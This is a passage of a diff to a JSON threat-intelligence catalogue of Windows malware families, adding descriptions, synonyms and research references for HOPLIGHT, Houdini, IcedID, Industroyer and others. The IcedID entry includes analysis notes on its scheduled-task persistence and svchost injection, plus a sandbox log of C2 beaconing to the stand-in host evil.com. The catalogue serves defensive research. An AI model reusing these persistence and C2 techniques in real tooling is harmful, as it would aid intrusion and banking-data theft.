conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [], "type": [] @@ -9510,16 +17733,132 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", - "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", - "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex", + "https://twitter.com/CDA/status/1014144988454772736", + "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" ], "synonyms": [], "type": [] }, + "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", + "value": "HookInjEx" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-304a", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf", + "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" + ], + "synonyms": [ + "HANGMAN" + ], + "type": [] + }, "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", "value": "HOPLIGHT" }, + { + "description": "Hopscotch is part of the Regin framework.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch", + "https://www.youtube.com/watch?v=VnzP00DZlx4" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0ab4f3ce-5474-4b1e-8ad9-b9ad80e75be8", + "value": "Hopscotch" + }, + { + "description": "Remote Acess Tool Written in VB.NET.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes", + "https://github.com/arsium/HorusEyesRat_Public" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cbe47d19-2f74-4dbc-84b5-44c31518c8a7", + "value": "HorusEyes RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d", + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4500694c-d71a-4d11-8f9c-0036156826b6", + "value": "HOTCROISSANT" + }, + { + "description": "HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d5391c00-9a75-457c-9ef0-0a75c5df8348", + "value": "HOTWAX" + }, + { + "description": "Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", + "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/", + "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html", + "https://www.youtube.com/watch?v=h3KLKCdMUUY", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md", + "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", + "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/", + "https://blogs.360.cn/post/APT-C-44.html", + "http://blog.morphisec.com/hworm-houdini-aka-njrat", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "https://cofense.com/houdini-worm-transformed-new-phishing-attack/" + ], + "synonyms": [ + "Hworm", + "Jenxcus", + "Kognito", + "Njw0rm", + "WSHRAT", + "dinihou", + "dunihi" + ], + "type": [] + }, + "uuid": "11775f11-03a0-4ba8-932f-c125dfb66e35", + "value": "Houdini" + }, { "description": "", "meta": { @@ -9550,8 +17889,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", - "https://www.secureworks.com/research/htran" + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.secureworks.com/research/htran", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" ], "synonyms": [ "HUC Packet Transmit Tool" @@ -9566,9 +17912,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", - "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/" + ], + "synonyms": [ + "HttpDump" ], - "synonyms": [], "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", @@ -9609,23 +17961,73 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412", - "http://blogs.360.cn/post/analysis-of-apt-c-37.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter", + "https://twitter.com/3xp0rtblog/status/1324800226381758471" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c93fdbb9-aafc-441d-a66f-aaf038f10bd3", + "value": "Hunter Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hupigon", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-repurpose-hupigon-adult-dating-attacks-targeting-us-universities" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40157734-eb33-4187-bcc8-2cd168db6fda", + "value": "Hupigon" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d3d86184-3c5c-478b-8f8b-f56f1a02247d", + "value": "Hussar" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hxdef", + "https://de.securelist.com/malware-entwicklung-im-ersten-halbjahr-2007/59574/" ], "synonyms": [ - "houdini" + "HacDef", + "HackDef", + "HackerDefender" ], "type": [] }, - "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm" + "uuid": "906adc27-757d-42bd-b8a2-f8a134077343", + "value": "HxDef" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://securelist.com/luckymouse-hits-national-data-center/86083/" ], "synonyms": [], @@ -9635,26 +18037,63 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", - "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", - "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", + "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", "https://www.youtube.com/watch?v=wObF9n2UIAM", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", + "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://tccontre.blogspot.com/2021/01/", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", + "https://www.group-ib.com/blog/icedid", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", - "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", + "https://github.com/f0wl/deICEr", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", + "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" + "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back" ], "synonyms": [ - "BokBot" + "BokBot", + "IceID" ], "type": [] }, @@ -9680,19 +18119,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", - "http://www.kz-cert.kz/page/502" + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "http://www.kz-cert.kz/page/502", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" + ], + "synonyms": [ + "Fucobha" ], - "synonyms": [], "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", "value": "Icefog" }, { - "description": "", + "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", + "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" @@ -9703,6 +18149,34 @@ "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", "value": "Ice IX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown", + "https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f7ae3da-948c-4f74-8229-d5d7461f9c7d", + "value": "IconDown" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart" + ], + "synonyms": [ + "Troxen" + ], + "type": [] + }, + "uuid": "bcc8b6ea-9295-4a22-a70d-422b1fd9814e", + "value": "IcyHeart" + }, { "description": "", "meta": { @@ -9734,6 +18208,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], @@ -9747,8 +18222,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/", + "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/", "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", - "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" + "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/" ], "synonyms": [], "type": [] @@ -9756,16 +18235,102 @@ "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", "value": "Imminent Monitor RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer", + "https://www.zscaler.com/blogs/research/immortal-information-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5f688e85-5f33-4ae6-880a-fc2e5146dd28", + "value": " Immortal Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.indigodrop", + "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e98b19ce-82c3-472d-98d1-d81341af4267", + "value": "IndigoDrop" + }, + { + "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer", + "https://en.wikipedia.org/wiki/Industroyer", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ], + "synonyms": [ + "Crash", + "CrashOverride" + ], + "type": [] + }, + "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", + "value": "Industroyer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno", + "https://github.com/LimerBoy/Inferno" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7638ac2e-0cdc-4101-8e3d-54b7b74a9c92", + "value": "Inferno" + }, + { + "description": "", + "meta": { + "refs": [ + 